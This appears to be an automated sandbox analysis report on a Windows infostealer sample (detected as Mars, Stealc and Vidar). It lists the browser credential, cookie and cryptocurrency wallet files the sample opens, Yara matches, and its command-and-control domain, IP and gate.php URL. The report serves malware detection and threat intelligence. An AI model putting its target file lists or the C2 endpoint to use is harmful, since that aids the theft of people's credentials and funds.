Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: m0wsoI3.exe, 00000000.00000002.1300238771.000000000051D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\\keystore*@
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.000000000051D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\\keystore*@
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: file__0.localstorage
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default_wallet
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: multidoge.wallet
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: m0wsoI3.exe, 00000000.00000002.1300238771.000000000051D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\\keystore*@
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: m0wsoI3.exe PID: 7292, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: m0wsoI3.exe, type: SAMPLE
Source: Yara match File source: 0.0.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1233026498.000000000043C000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1300112411.000000000043C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match File source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: m0wsoI3.exe PID: 7292, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6090C1D6 sqlite3_clear_bindings, 0_2_6090C1D6
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609254B1 sqlite3_bind_zeroblob, 0_2_609254B1
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6090F435 sqlite3_bind_parameter_index, 0_2_6090F435
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609255D4 sqlite3_bind_text16, 0_2_609255D4
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609255FF sqlite3_bind_text, 0_2_609255FF
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60925686 sqlite3_bind_int64, 0_2_60925686
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609256E5 sqlite3_bind_int, 0_2_609256E5
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6092562A sqlite3_bind_blob, 0_2_6092562A
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60925655 sqlite3_bind_null, 0_2_60925655
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6092570B sqlite3_bind_double, 0_2_6092570B
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60925778 sqlite3_bind_value, 0_2_60925778
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6090577D sqlite3_bind_parameter_name, 0_2_6090577D
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6090576B sqlite3_bind_parameter_count, 0_2_6090576B
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6090EAE5 sqlite3_transfer_bindings, 0_2_6090EAE5
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1640592 Sample: m0wsoI3.exe Startdate: 17/03/2025 Architecture: WINDOWS Score: 100 27 ctrlgem.xyz 2->27 31 Suricata IDS alerts for network traffic 2->31 33 Found malware configuration 2->33 35 Malicious sample detected (through community Yara rule) 2->35 39 11 other signatures 2->39 8 m0wsoI3.exe 87 2->8         started        signatures3 37 Performs DNS queries to domains with low reputation 27->37 process4 dnsIp5 29 ctrlgem.xyz 188.114.97.3, 49693, 80 CLOUDFLARENETUS European Union 8->29 19 C:\ProgramData\vcruntime140.dll, PE32 8->19 dropped 21 C:\ProgramData\softokn3.dll, PE32 8->21 dropped 23 C:\ProgramData\nss3.dll, PE32 8->23 dropped 25 5 other malicious files 8->25 dropped 41 Detected unpacking (creates a PE file in dynamic memory) 8->41 43 Found evasive API chain (may stop execution after checking mutex) 8->43 45 Found many strings related to Crypto-Wallets (likely being stolen) 8->45 47 6 other signatures 8->47 13 cmd.exe 1 8->13         started        file6 signatures7 process8 process9 15 conhost.exe 13->15         started        17 timeout.exe 1 13->17         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.114.97.3
 ctrlgem.xyz European Union
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
ctrlgem.xyz 188.114.97.3 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
ctrlgem.xyz/gate.php true
  • Avira URL Cloud: malware
 unknown
http://ctrlgem.xyz/request true
  • Avira URL Cloud: safe
 unknown
http://ctrlgem.xyz/gate.php true
  • Avira URL Cloud: malware
 unknown